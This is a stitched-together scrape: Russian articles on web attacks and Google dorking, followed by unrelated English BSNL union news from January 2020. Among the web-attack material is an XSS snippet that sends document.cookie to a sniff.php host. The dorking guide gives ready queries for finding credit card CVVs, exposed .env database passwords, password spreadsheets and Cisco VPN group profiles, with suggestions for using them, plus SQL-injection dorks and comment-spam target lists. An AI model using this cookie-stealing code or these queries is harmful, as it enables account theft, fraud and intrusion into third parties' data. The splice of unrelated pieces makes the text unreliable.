Я решил немного рассказать об информационной безопасности. Статья будет полезна начинающим программистам и тем, кто только-только начал заниматься Frontend-разработкой. В чём проблема?

Многие начинающие разработчики так увлекаются написанием кода, что совсем забывают о безопасности своих работ. И что самое главное - забывают о таких уязвимостях, как запрос SQL, XXS. А ещё придумывают лёгкие пароли для своих административных панелей и подвергаются брутфорсу. Что это за атаки и как можно их избежать?

SQL-инъекция

SQL-инъекция – это самый распространённый вид атаки на базу данных, который осуществляется при SQL-запросе для конкретной СУБД. От таких атак страдает множество людей и даже крупных компаний. Причина - ошибка разработчика при написании базы данных и, собственно говоря, SQL-запросов.

Атака типа внедрения SQL возможна из-за некорректной обработки входных данных, используемых в SQL-запросах. При удачном прохождении атаки со стороны хакера вы рискуете потерять не только содержимое баз данных, но и соответственно пароли и логи административной панели. А этих данных будет вполне достаточно, чтобы полностью завладеть сайтом или внести в него необратимые коррективы.

Атака может быть удачно воспроизведена в сценариях, написанных на PHP, ASP, Perl и других языках. Успешность таких атак больше зависит от того, какая используется СУБД и как реализован сам сценарий. В мире очень много уязвимых сайтов для SQL-инъекций. В этом легко убедиться. Достаточно ввести «дорки» - это специальные запросы по поиску уязвимых сайтов. Вот некоторые из них:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Как ими пользоваться? Достаточно ввести их в поисковик Google или Яндекс. Поисковик выдаст вам не просто уязвимый сайт, но и страницу на эту уязвимость. Но мы не будем на этом останавливаться и убедимся, что страница действительно уязвима. Для это достаточно после значения «id=1» поставить одинарную кавычку «‘». Как-то так:

  • inurl:games.php?id=1’

И сайт нам выдаст ошибку о запросе SQL. Что же нужно дальше нашему хакеру?

А дальше ему нужна это самая ссылка на страницу с ошибкой. Затем работа над уязвимостью в большинстве случаев происходит в дистрибутиве "Kali linux" с его утилитами по этой части: внедрение инъекционного кода и выполнение необходимых операций. Как это будет происходить, я вам не могу сказать. Но об этом можно найти информацию в интернете.

XSS Атака

Данный вид атаки осуществляется на файлы Cookies. Их в свою очередь очень любят сохранять пользователи. А почему нет? Как же без них? Ведь благодаря Cookies мы не вбиваем сто раз пароль от Vk.com или Mail.ru. И мало тех, кто от них отказывается. Но в интернете для хакеров часто фигурирует правило: коэффициент удобства прямо пропорционален коэффициенту небезопасности.

Для реализации XSS-атаки нашему хакеру нужно знание JavaScript. Язык на первый взгляд очень прост и безобиден, потому что не имеет доступа к ресурсам компьютера. Работать с JavaScript хакер может только в браузере, но и этого достаточно. Ведь главное ввести код в веб-страницу.

Подробно говорить о процессе атаки я не стану. Расскажу лишь основы и смысл того, как это происходит.

Хакер может добавить на какой-нибудь форум или гостевую книгу JS-код:

document.location.href =”http://192.168.1.7/sniff.php?test”

Скрипты переадресуют нас на заражённую страницу, где будет выполнятся код: будь то сниффер, какое-либо хранилище или эксплоид, который так или иначе похитит наши Cookies с кэша.

Почему именно JavaScript? Потому что JavaScript отлично ладит с веб-запросами и имеет доступ к Cookies. Но если наш скрипт будет переводить нас на какой-нибудь сайт, то пользователь это легко заметит. Здесь же хакер применяет более хитрый вариант - просто вписывает код в картинку.

Img=new Image();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Мы просто создаём изображение и приписываем ему в качестве адреса наш сценарий.

Как уберечься от всего этого? Очень просто - не переходите по подозрительным ссылкам.

DoS и DDos Атаки

DoS (от англ. Denial of Service - отказ в обслуживании) - хакерская атака на вычислительную систему с целью привести её к отказу. Это создание таких условий, при которых добросовестные пользователи системы не могут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ затруднён. Отказ системы может быть и шагом к её захвату, если во внештатной ситуации ПО выдаёт какую-либо критическую информацию: например, версию, часть программного кода и пр. Но чаще всего это мера экономического давления: потеря простой службы, приносящей доход. Счета от провайдера или меры по уходу от атаки ощутимо бьют «цель» по карману.В настоящее время DoS и DDoS-атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик.

Чем отличается DoS от DDos атаки?

DoS это атака построенная умным способом. Например, если сервер не проверяет корректность входящих пакетов, то хакер может сделать такой запрос, который будет обрабатываться вечно, а на работу с другими соединениями не хватит процессорного времени. Соответственно клиенты получат отказ в обслуживании. Но перегрузить или вывести из строя таким способом крупные известные сайты не получится. У них на вооружении стоят достаточно широкие каналы и сверхмощные серверы, которые без проблем справляются с подобной перегрузкой.

DDoS - это фактически такая же атака, как и DoS. Но если в DoS один пакет запроса, то в DDoS их очень может быть от сотни и более. Даже сверхмощные сервера могут не справиться с такой перегрузкой. Приведу пример.

DoS атака - это когда ты ведёшь разговор с кем-то, но тут подходит какой-то невоспитанный человек и начинает громко кричать. Разговаривать при этом либо невозможно, либо очень сложно. Решение: вызвать охрану, которая успокоит и выведет человека из помещения. DDoS-атаки - это когда таких невоспитанных людей вбегает многотысячная толпа. В таком случае охрана не сумеет всех скрутить и увести.

DoS и DDoS производятся с компьютеров, так называемых зомби. Это взломанные хакерами компьютеры пользователей, которые даже не подозревают, что их машина участвует в атаке какого-либо сервера.

Как уберечь себя от этого? В общем-то никак. Но можно усложнить задачу хакеру. Для этого необходимо выбрать хороший хостинг с мощными серверами.

Bruteforce атака

Разработчик может придумать очень много систем защиты от атак, полностью просмотреть написанные нами скрипты, проверить сайт на уязвимость и т.д. Но когда дойдёт до последнего шага вёрстки сайта, а именно когда будет просто ставить пароль на админку, он может забыть об одной вещи. Пароль!

Категорически не рекомендуется ставить простой пароль. Это могут быть 12345, 1114457, vasya111 и т. д. Не рекомендуется ставить пароли длиной меньше 10-11 символов. Иначе вы можете подвергнуться самой обычной и не сложной атаки - Брутфорсу.

Брутфорс - это атака перебора пароля по словарю с использованием специальных программ. Словари могут быть разные: латиница, перебор по цифрам скажем до какого-либо диапазона, смешанные (латиница +цифры), и даже бывают словари с уникальными символами @#4$%&*~~`’”\ ? и пр.

Конечно такого вида атаки легко избежать.Достаточно придумать сложный пароль. Вас может спасти даже капча. А ещё, если ваш сайт сделан на CMS, то многие из них вычисляют подобный вид атаки и блокируют ip. Надо всегда помнить, чем больше разных символов в пароле, тем тяжелее его подобрать.

Как же работают «Хакеры»? В большинстве случаев они либо подозревают, либо заранее знают часть пароля. Совсем логично предположить, что пароль пользователя уж точно не будет состоять из 3 или 5 символов. Такие пароли приводят к частым взломам. В основном хакеры берут диапазон от 5 до 10 символов и прибавляют туда несколько символов, которые возможно знают заранее. Далее генерируют пароли с нужными диапазонами. В дистрибутиве Kali linux имеются даже программы для таких случаев. И вуаля, атака уже не будет длиться долго, так как объём словаря уже не такой и большой. К тому же хакер может задействовать мощность видеокарты. Некоторые из них поддерживают систему CUDA, при этом скорость перебора увеличивается аж в 10 раз. И вот мы видим, что атака таким простым способом вполне реальна. А ведь брутфорсу подвергаются не только сайты.

Дорогие разработчики, никогда не забывайте про систему информационной безопасности, ведь сегодня от подобных видов атак страдает немало людей, в том числе и государств. Ведь самой большой уязвимостью является человек, который всегда может где-то отвлечься или где-то не доглядеть. Мы программисты, но не запрограммированные машины. Будьте всегда начеку, ведь утеря информации грозит серьёзными последствиями!

Получение частных данных не всегда означает взлом - иногда они опубликованы в общем доступе. Знание настроек Google и немного смекалки позволят найти массу интересного - от номеров кредиток до документов ФБР.

WARNING Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред, причиненный материалами данной статьи.

К интернету сегодня подключают всё подряд, мало заботясь об ограничении доступа. Поэтому многие приватные данные становятся добычей поисковиков. Роботы-«пауки» уже не ограничиваются веб-страницами, а индексируют весь доступный в Сети контент и постоянно добавляют в свои базы не предназначенную для разглашения информацию. Узнать эти секреты просто - нужно лишь знать, как именно спросить о них.

Ищем файлы

В умелых руках Google быстро найдет все, что плохо лежит в Сети, - например, личную информацию и файлы для служебного использования. Их частенько прячут, как ключ под половиком: настоящих ограничений доступа нет, данные просто лежат на задворках сайта, куда не ведут ссылки. Стандартный веб-интерфейс Google предоставляет лишь базовые настройки расширенного поиска, но даже их будет достаточно.

Ограничить поиск по файлам определенного вида в Google можно с помощью двух операторов: filetype и ext . Первый задает формат, который поисковик определил по заголовку файла, второй - расширение файла, независимо от его внутреннего содержимого. При поиске в обоих случаях нужно указывать лишь расширение. Изначально оператор ext было удобно использовать в тех случаях, когда специфические признаки формата у файла отсутствовали (например, для поиска конфигурационных файлов ini и cfg, внутри которых может быть все что угодно). Сейчас алгоритмы Google изменились, и видимой разницы между операторами нет - результаты в большинстве случаев выходят одинаковые.


Фильтруем выдачу

По умолчанию слова и вообще любые введенные символы Google ищет по всем файлам на проиндексированных страницах. Ограничить область поиска можно по домену верхнего уровня, конкретному сайту или по месту расположения искомой последовательности в самих файлах. Для первых двух вариантов используется оператор site, после которого вводится имя домена или выбранного сайта. В третьем случае целый набор операторов позволяет искать информацию в служебных полях и метаданных. Например, allinurl отыщет заданное в теле самих ссылок, allinanchor - в тексте, снабженном тегом , allintitle - в заголовках страниц, allintext - в теле страниц.

Для каждого оператора есть облегченная версия с более коротким названием (без приставки all). Разница в том, что allinurl отыщет ссылки со всеми словами, а inurl - только с первым из них. Второе и последующие слова из запроса могут встречаться на веб-страницах где угодно. Оператор inurl тоже имеет отличия от другого схожего по смыслу - site . Первый также позволяет находить любую последовательность символов в ссылке на искомый документ (например, /cgi-bin/), что широко используется для поиска компонентов с известными уязвимостями.

Попробуем на практике. Берем фильтр allintext и делаем так, чтобы запрос выдал список номеров и проверочных кодов кредиток, срок действия которых истечет только через два года (или когда их владельцам надоест кормить всех подряд).

Allintext: card number expiration date /2017 cvv

Когда читаешь в новостях, что юный хакер «взломал серверы» Пентагона или NASA, украв секретные сведения, то в большинстве случаев речь идет именно о такой элементарной технике использования Google. Предположим, нас интересует список сотрудников NASA и их контактные данные. Наверняка такой перечень есть в электронном виде. Для удобства или по недосмотру он может лежать и на самом сайте организации. Логично, что в этом случае на него не будет ссылок, поскольку предназначен он для внутреннего использования. Какие слова могут быть в таком файле? Как минимум - поле «адрес». Проверить все эти предположения проще простого.


Inurl:nasa.gov filetype:xlsx "address"


Пользуемся бюрократией

Подобные находки - приятная мелочь. По-настоящему же солидный улов обеспечивает более детальное знание операторов Google для веб-мастеров, самой Сети и особенностей структуры искомого. Зная детали, можно легко отфильтровать выдачу и уточнить свойства нужных файлов, чтобы в остатке получить действительно ценные данные. Забавно, что здесь на помощь приходит бюрократия. Она плодит типовые формулировки, по которым удобно искать случайно просочившиеся в Сеть секретные сведения.

Например, обязательный в канцелярии министерства обороны США штамп Distribution statement означает стандартизированные ограничения на распространение документа. Литерой A отмечаются публичные релизы, в которых нет ничего секретного; B - предназначенные только для внутреннего использования, C - строго конфиденциальные и так далее до F. Отдельно стоит литера X, которой отмечены особо ценные сведения, представляющие государственную тайну высшего уровня. Пускай такие документы ищут те, кому это положено делать по долгу службы, а мы ограничимся файлами с литерой С. Согласно директиве DoDI 5230.24, такая маркировка присваивается документам, содержащим описание критически важных технологий, попадающих под экспортный контроль. Обнаружить столь тщательно охраняемые сведения можно на сайтах в домене верхнего уровня.mil, выделенного для армии США.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

Очень удобно, что в домене.mil собраны только сайты из ведомства МО США и его контрактных организаций. Поисковая выдача с ограничением по домену получается исключительно чистой, а заголовки - говорящими сами за себя. Искать подобным образом российские секреты практически бесполезно: в доменах.ru и.рф царит хаос, да и названия многих систем вооружения звучат как ботанические (ПП «Кипарис», САУ «Акация») или вовсе сказочные (ТОС «Буратино»).


Внимательно изучив любой документ с сайта в домене.mil, можно увидеть и другие маркеры для уточнения поиска. Например, отсылку к экспортным ограничениям «Sec 2751», по которой также удобно искать интересную техническую информацию. Время от времени ее изымают с официальных сайтов, где она однажды засветилась, поэтому, если в поисковой выдаче не удается перейти по интересной ссылке, воспользуйся кешем Гугла (оператор cache) или сайтом Internet Archive.

Забираемся в облака

Помимо случайно рассекреченных документов правительственных ведомств, в кеше Гугла временами всплывают ссылки на личные файлы из Dropbox и других сервисов хранения данных, которые создают «приватные» ссылки на публично опубликованные данные. С альтернативными и самодельными сервисами еще хуже. Например, следующий запрос находит данные всех клиентов Verizon, у которых на роутере установлен и активно используется FTP-сервер.

Allinurl:ftp:// verizon.net

Таких умников сейчас нашлось больше сорока тысяч, а весной 2015-го их было на порядок больше. Вместо Verizon.net можно подставить имя любого известного провайдера, и чем он будет известнее, тем крупнее может быть улов. Через встроенный FTP-сервер видно файлы на подключенном к маршрутизатору внешнем накопителе. Обычно это NAS для удаленной работы, персональное облако или какая-нибудь пиринговая качалка файлов. Все содержимое таких носителей оказывается проиндексировано Google и другими поисковиками, поэтому получить доступ к хранящимся на внешних дисках файлам можно по прямой ссылке.

Подсматриваем конфиги

До повальной миграции в облака в качестве удаленных хранилищ рулили простые FTP-серверы, в которых тоже хватало уязвимостей. Многие из них актуальны до сих пор. Например, у популярной программы WS_FTP Professional данные о конфигурации, пользовательских аккаунтах и паролях хранятся в файле ws_ftp.ini . Его просто найти и прочитать, поскольку все записи сохраняются в текстовом формате, а пароли шифруются алгоритмом Triple DES после минимальной обфускации. В большинстве версий достаточно просто отбросить первый байт.

Расшифровать такие пароли легко с помощью утилиты WS_FTP Password Decryptor или бесплатного веб-сервиса .

Говоря о взломе произвольного сайта, обычно подразумевают получение пароля из логов и бэкапов конфигурационных файлов CMS или приложений для электронной коммерции. Если знаешь их типовую структуру, то легко сможешь указать ключевые слова. Строки, подобные встречающимся в ws_ftp.ini , крайне распространены. Например, в Drupal и PrestaShop обязательно есть идентификатор пользователя (UID) и соответствующий ему пароль (pwd), а хранится вся информация в файлах с расширением.inc. Искать их можно следующим образом:

"pwd=" "UID=" ext:inc

Раскрываем пароли от СУБД

В конфигурационных файлах SQL-серверов имена и адреса электронной почты пользователей хранятся в открытом виде, а вместо паролей записаны их хеши MD5. Расшифровать их, строго говоря, невозможно, однако можно найти соответствие среди известных пар хеш - пароль.

До сих пор встречаются СУБД, в которых не используется даже хеширование паролей. Конфигурационные файлы любой из них можно просто посмотреть в браузере.

Intext:DB_PASSWORD filetype:env

С появлением на серверах Windows место конфигурационных файлов отчасти занял реестр. Искать по его веткам можно точно таким же образом, используя reg в качестве типа файла. Например, вот так:

Filetype:reg HKEY_CURRENT_USER "Password"=

Не забываем про очевидное

Иногда добраться до закрытой информации удается с помощью случайно открытых и попавших в поле зрения Google данных. Идеальный вариант - найти список паролей в каком-нибудь распространенном формате. Хранить сведения аккаунтов в текстовом файле, документе Word или электронной таблице Excel могут только отчаянные люди, но как раз их всегда хватает.

Filetype:xls inurl:password

С одной стороны, есть масса средств для предотвращения подобных инцидентов. Необходимо указывать адекватные права доступа в htaccess, патчить CMS, не использовать левые скрипты и закрывать прочие дыры. Существует также файл со списком исключений robots.txt, запрещающий поисковикам индексировать указанные в нем файлы и каталоги. С другой стороны, если структура robots.txt на каком-то сервере отличается от стандартной, то сразу становится видно, что на нем пытаются скрыть.

Список каталогов и файлов на любом сайте предваряется стандартной надписью index of. Поскольку для служебных целей она должна встречаться в заголовке, то имеет смысл ограничить ее поиск оператором intitle . Интересные вещи находятся в каталогах /admin/, /personal/, /etc/ и даже /secret/.

Следим за обновлениями

Актуальность тут крайне важна: старые уязвимости закрывают очень медленно, но Google и его поисковая выдача меняются постоянно. Есть разница даже между фильтром «за последнюю секунду» (&tbs=qdr:s в конце урла запроса) и «в реальном времени» (&tbs=qdr:1).

Временной интервал даты последнего обновления файла у Google тоже указывается неявно. Через графический веб-интерфейс можно выбрать один из типовых периодов (час, день, неделя и так далее) либо задать диапазон дат, но такой способ не годится для автоматизации.

По виду адресной строки можно догадаться только о способе ограничить вывод результатов с помощью конструкции &tbs=qdr: . Буква y после нее задает лимит в один год (&tbs=qdr:y), m показывает результаты за последний месяц, w - за неделю, d - за прошедший день, h - за последний час, n - за минуту, а s - за секунду. Самые свежие результаты, только что ставшие известными Google, находится при помощи фильтра &tbs=qdr:1 .

Если требуется написать хитрый скрипт, то будет полезно знать, что диапазон дат задается в Google в юлианском формате через оператор daterange . Например, вот так можно найти список документов PDF со словом confidential, загруженных c 1 января по 1 июля 2015 года.

Confidential filetype:pdf daterange:2457024-2457205

Диапазон указывается в формате юлианских дат без учета дробной части. Переводить их вручную с григорианского календаря неудобно. Проще воспользоваться конвертером дат .

Таргетируемся и снова фильтруем

Помимо указания дополнительных операторов в поисковом запросе их можно отправлять прямо в теле ссылки. Например, уточнению filetype:pdf соответствует конструкция as_filetype=pdf . Таким образом удобно задавать любые уточнения. Допустим, выдача результатов только из Республики Гондурас задается добавлением в поисковый URL конструкции cr=countryHN , а только из города Бобруйск - gcs=Bobruisk . В разделе для разработчиков можно найти полный список .

Средства автоматизации Google призваны облегчить жизнь, но часто добавляют проблем. Например, по IP пользователя через WHOIS определяется его город. На основании этой информации в Google не только балансируется нагрузка между серверами, но и меняются результаты поисковой выдачи. В зависимости от региона при одном и том же запросе на первую страницу попадут разные результаты, а часть из них может вовсе оказаться скрытой. Почувствовать себя космополитом и искать информацию из любой страны поможет ее двухбуквенный код после директивы gl=country . Например, код Нидерландов - NL, а Ватикану и Северной Корее в Google свой код не положен.

Часто поисковая выдача оказывается замусоренной даже после использования нескольких продвинутых фильтров. В таком случае легко уточнить запрос, добавив к нему несколько слов-исключений (перед каждым из них ставится знак минус). Например, со словом Personal часто употребляются banking , names и tutorial . Поэтому более чистые поисковые результаты покажет не хрестоматийный пример запроса, а уточненный:

Intitle:"Index of /Personal/" -names -tutorial -banking

Пример напоследок

Искушенный хакер отличается тем, что обеспечивает себя всем необходимым самостоятельно. Например, VPN - штука удобная, но либо дорогая, либо временная и с ограничениями. Оформлять подписку для себя одного слишком накладно. Хорошо, что есть групповые подписки, а с помощью Google легко стать частью какой-нибудь группы. Для этого достаточно найти файл конфигурации Cisco VPN, у которого довольно нестандартное расширение PCF и узнаваемый путь: Program Files\Cisco Systems\VPN Client\Profiles . Один запрос, и ты вливаешься, к примеру, в дружный коллектив Боннского университета.

Filetype:pcf vpn OR Group

INFO Google находит конфигурационные файлы с паролями, но многие из них записаны в зашифрованном виде или заменены хешами. Если видишь строки фиксированной длины, то сразу ищи сервис расшифровки.

Пароли хранятся в зашифрованном виде, но Морис Массар уже написал программу для их расшифровки и предоставляет ее бесплатно через thecampusgeeks.com .

При помощи Google выполняются сотни разных типов атак и тестов на проникновение. Есть множество вариантов, затрагивающих популярные программы, основные форматы баз данных, многочисленные уязвимости PHP, облаков и так далее. Если точно представлять то, что ищешь, это сильно упростит получение нужной информации (особенно той, которую не планировали делать всеобщим достоянием). Не Shodan единый питает интересными идеями, но всякая база проиндексированных сетевых ресурсов!

Как правильно искать с помощью google.com

Все наверное умеют пользоваться такой поисковой системой, как гугл =) Но не все знают, что если грамотно составить поисковой запрос с помощью специальных конструкций, то можно достичь результатов того, что Вы ищете намного эффективнее и быстрее =) В этой статье я постараюсь показать что и как Вам нужно делать, чтобы искать правильно

Гугл поддерживает несколько расширенных операторов поиска, имеющими специальное значение при поиске на google.com. Типично, эти операторы изменяют поиск, или даже говорят гуглу делать полностью различные типы поиска. Например, конструкция link: является специальным оператором, и запрос link:www.google.com не даст вам нормального поиска, но вместо этого найдет все web-страницы, которые имеют связи к google.com.
альтернативные типы запросов

cache: Если Вы будете включать другие слова в запрос, то Гугл подсветит эти включенные слова в пределах кэшируемого документа.
Например, cache:www.сайт web покажет кэшируемое содержимое с подсвеченным словом "web".

link: рассматриваемый выше поисковой запрос покажет веб-страницы, на которых содержатся ссылки к указанному запросу.
Например: link:www.сайт отобразит все страницы на которых есть ссылка на http://www.сайт

related: Отобразит web-страницы, которые являются "подобными" (related) указанной web-странице.
Например, related: www.google.com перечислит web-страницы, которые являются подобными домашней странице Гугл.

info: Информация запроса: представит немного информации, которую Гугл имеет о запрашиваемой web-странице.
Например, info:сайт покажет информацию о нашем форуме =) (Армада - Форум адалт вебмастеров).

Другие информационные запросы

define: Запрос define: обеспечит определение слов, которые Вы вводите после того, как это, собранный из различных сетевых источников. Определение будет для всей введенной фразы (то есть, это будет включать все слова в точный запрос).

stocks: Если Вы начинаете запрос с stocks: Гугл обработает остальную часть сроков запроса как символы биржевых сводок, и свяжется со страницей, показывающую готовую информацию для этих символов.
Например, stocks: Intel yahoo покажет информацию о Intel и Yahoo. (Отметьте, что Вы должны напечатать символы последних новостей, не название компании)

Модификаторы Запросов

site: Если Вы включаете site: в ваш запрос, Гугл ограничит результаты теми вебсайтами, которые найдет в данном домене.
Также можно искать и по отдельным зонам, как таковое ru, org, com, etc ( site:com site:ru )

allintitle: Если Вы запускаете запрос с allintitle:, Гугл ограничит результаты со всеми словами запроса в заголовке.
Например, allintitle: google search вернет все страницы гугла по поиску как то images, Blog, etc

intitle: Если Вы включаете intitle: в вашем запросе, Гугл ограничит результаты документами, содержащими то слово в заголовке.
Например, intitle:Бизнес

allinurl: Если Вы запускаете запрос с allinurl: Гугл ограничит результаты, со всеми словами запроса в URL.
Например, allinurl: google search вернет документы с google и search в заголовке. Также как вариант можно разделять слова слэшем (/) тогда слова по обе стороны слэша будут искаться в пределах одной страницы: Пример allinurl: foo/bar

inurl: Если Вы включаете inurl: в вашем запросе, Гугл ограничит результаты документами, содержащими то слово в URL.
Например, Animation inurl:сайт

intext: ищет только в тексте страницы указанное слово, игнорируя заглавие и тексты ссылок, и прочее не относящееся к. Есть также и производная этого модификатора - allintext: т.е. далее все слова в запросе будут искаться только в тексте, что тоже бывает важно, игнорируя часто используемые слова в ссылках
Например, intext:форум

daterange: ищет во временных рамках (daterange:2452389-2452389), даты для времени указываются в Юлианском формате.

Ну и еще всякие интересные примеры запросов

Примеры составления запросов для Google. Для спамеров

Inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp “Character Count”

“Message:” inurl:sign.cfm “Sender:”

Inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post “Post Comment” “URL”

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

Inurl:?action=add “phpBook” “URL”

Intitle:”Submit New Story”

Журналы

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? “Гостевая книга”

Блоги

Inurl:blogger.com/comment.g?”postID”"anonymous”

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:”Post comment”

Inurl:pirillo.com “Post comment”

Форумы

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:”mes.php?”

Inurl:”members.html”

Inurl:forum/memberlist.php?”

Messages updated during the month of Jan 2020

16-01-2020

Condolence Message

SNEA Expresses Deep Sorrow for the Demise of

Veteran Leader

Com K.Viswanathan

CHQ Treasurer of JETA/JTOA (3 Times)

19/11, D block Nandhini flats church road, Chrompet Chennai 44,


15-01-2020

15-01-2020

15-01-2020

A Vital Breakthrough for Triple Play FTTH service through BSNL:

Open policy for provision of IPTV: The much awaited Policy for Provision of IPTV services through BSNL FTTH by content providers/partners have been issued by BSNL CO.

This venture is touted as BSNLs answer to major Private Players providing Triple Play Services--

By this project, BSNL is going to provide Real Triple Play Service to customers because here Watching TV is not going to consume Internet Data.

This is going to be one major Lifeline for BSNL revival.

This Venture has already been successfully developed and implemented privately by an LCO/TIP in Thrissur BA in Kerala Circle with the technical support of BSNL in house talents led by Com Anoop K J, JTO OMCR, Ernakulam .

They have devised an App to make/receive landphone calls using mobile phone using WiFi.

This project was presented in the recently held CWC Meet of SNEA at Bangalore in Augusts, 2019.

Various Proposals have been received from different Circles for the implementation of IPTV through BSNL Network .

The absence of IPTV (or TV service) has been identified as one of the major reasons for the lacklustre response to BSNL FTTH connections from multi operator LCOs across the country .

SNEA have been pursuing the project in all levels and we are happy to see light at the end of the tunnel .

We congratulate in the in-house talents in BSNL who showcased their real potential .

SNEA thank all officers who have been working for the implementation of the project in BSNL CO and all Circle Offices and particularly Com. P Padmanabha Rao, our AGS & DGM, BSNL CO.

IPTV Open Policy

15-01-2020

Organizational Restructuring: Merger of Non-Territorial Circles.

Maintenance and Project Circles merged and renamed as Core Network-Transmission (East/West/North/South). Separate Circle for North East namely Core Network-Transmission NE Region covering AS, NE I and NE II Circles. Effective from 01.04.2020.

Telecom Factories merged with respective Territorial Circles as BA head w.e.f 01.02.2020.

NCNGN Circle merged with BBNW Circle.

Nodal Centre Chandigarh merged with Punjab Circle.

Only one Training Circle with HQ at ALTTC, Gaziabad. ALTTC, NATFM and BRBRAITT will function as BA Heads. Only zonal RTTCs in future.

Covering letterAnnexure

15-01-2020


14-01-2020

GS writes to Shri P K Purwar, CMD/BSNL:

Kindly take immediate action for Regular promotion instead of Look after arrangement in different Grades from among the Executives already working in higher scales by mere designation change to fill up the huge vacuum created in the field units by VRS 2019 and for motivating the Executives to take extra work load:

As per the data available, on 01.02.2020,

i) Only 57 DGM(T) will be available against the sanctioned strength of 1481.

ii) Only 32 DGM(Fin) will be available against the sanctioned strength of 402.

iii) Only 1746 AGM(T) will be available in BSNL instead of 6500 AGMs working one year back. On DGM promotion, the number of AGMs will be about 1200, less than 20%. SDEs with 15 years of service are waiting for promotion.

iv) Only 70 CAOs will be available against the sanctioned strength of 1347. They will not be sufficient even to man the vacant DGM(Fin) posts.

v) Thousands of Executives in higher scales are working in JTO, SDE equivalent grades for 5 to 30 years and waiting for the promotion. JTOs recruited from 1988 are waiting for promotion in Arch wing. Thousands of JTOs from 1999, 2001 to 2008, 2010, 2013 etc batches are waiting for their first promotion. JTO(Civil/Elect/TF) wing status is equally bad.

We totally object to the prevalent look after arrangement being followed by the management instead of regular promotion. The Executives are already working in higher scales and they may be promoted to higher grades on regular basis just by designation change, instead of LA arrangement.

GS letter to CMD

11-01-2020

Meeting with Shri Arvind Vadnerkar, DIR(HR) on 09.01.2020: GS, President and both AGSs met DIR(HR) in the presence of Sr GM(Pers & Estt), GM(SR), GM(Restg), GM(Admn) and GMs(Pers) and held discussions on the following issues:

Staffing norms and Restructuring of BSNL: We explained the temporary staffing norm issued by Restg cell is not at all workable as the field realities are not considered by the management. By the temp norms, some SSAs headed by GMs today has to be headed by an SDE in the future. There will be large number of small SSAs with huge geographical areas where only one or two Executives will be justified. Practically it will be impossible to maintain the services in those areas. By outsourcing, the role and responsibility of Executives will not come down especially in CFA segment. In Rural areas, clubbing all the works of Transmission, BTS mtce, EB, Cable maintenance with SDE(Group) with vast areas will defeat the very purpose. Similarly urban areas norms also stringent. So the temporary norms are to be reworked immediately. Otherwise nobody will come forward to work in the external plant and Trans mtce and those who are working also will request for posting in Indoor, mobile etc. Similarly substitutes are not marked in many SSAs for a smooth takeover on 31.01.2020. Director and GM(Restg) explained that it is only temporary norms which can be reviewed. We requested to review immediately.

We further explained the demand from the field units that maintenance of Primary Cable also should be included in the tender for outsourcing. Among the available TTs, very few have knowledge of cable jointing and they are not sufficient to maintain all the Primary Cables. Others are required for Indoor/MDF/Power Plant maintenance. This facts are explained in the meeting with DIR(CFA) but no favourable decisions come out so far. DIR(HR) assured to bring this important issue to the notice of DIR(CFA) again.

Promotions in the post VRS scenario and the need for Regular Promotion instead of Lookafter arrangement: We strongly protested against the move for giving Look after arrangement instead of Regular promotion. Almost DGM(T/Fin) positions and AGM/CAO/EE grades will become vacant after the VRS on 31.01.2020 and immediate action is to be taken for promotion, we demanded. Since large numbers of Executives with sufficient experiences are working in higher scales, they can be simply given promotion by designation change, we pointed out. Similarly thousands of JTOs in different wings are already in higher scales and can be given promotion by re-designation. Even DPC is not required. LA arrangement is against the interest of the Executives as they loses the service and future promotional avenues. Management is making LA years together and denying regular promotions. We demanded stopping of this mechanism and provide regular promotions for all the eligible Executives.

On DGM promotions, SNEA explained the meeting with Secretary, DoT on 01.01.2020 and his positive decision allowing DGM promotions. Even DoT given promotion to Sr DDG (CGM) level on 30.12.2019 for those retiring on 31.12.2019 but BSNL is not taking any action to give promotion to the vacant posts before their retirement. After discussion, DIR(HR) assured to discuss with Secretary/DoT and CMD/BSNL and do the needful for DGM promotions.

Reversion of 2001 Rect JTOs passed the LDCE -2007: Again discussion held on the matter and Assn explained their eligibility with reference to the SDE RR clause 12, note 5 and the clarifications issued in 2007 regarding their eligibility to appear in the LDCE-2007. Now some of them are reverted on the basis of the clarifications issued in 2012 for the LDCE 2010. The clarifications issued regarding eligibility for appearing in LDCE 2007 and LDCE 2010 are entirely different and that made the issue complicated. The eligibility has to be decided based on the clarifications issued for LDCE 2007, we demanded. Since they already become SDEs, they could not write the subsequent DCE held in 2012 and 2015. Among them also, some SDEs of TN Circle facing reversion while others are served only show cause notice. We demanded to stop the reversion process till the matter is decided based on the facts placed before the management. We suggested to form a Committee to examine the matter. Finally DIR(HR) directed the concerned Officers to bring all the related files the next day itself for taking appropriate decision.

10-01-2020

10-01-2020

10-01-2020

Meeting with Shri P. K. Purwar, CMD BSNL on 10.01.2020: General Secretaries and AGSs of AIBSNLEA and SNEA met CMD BSNL today and had the discussions on the following issues:

DGM (T) Promotions: Regarding promotions from DET to DGM (T), we explained about the meeting with Secretary (T) DoT on 01st Jan., and 03rd Jan., 2020 in which Secretary (T) agreed for the promotions for DGM (T) provided it is not creating any Additional Financial Implications. CMD BSNL informed that he had also discussed with Secretary (T) in this regard and trying to do the needful.

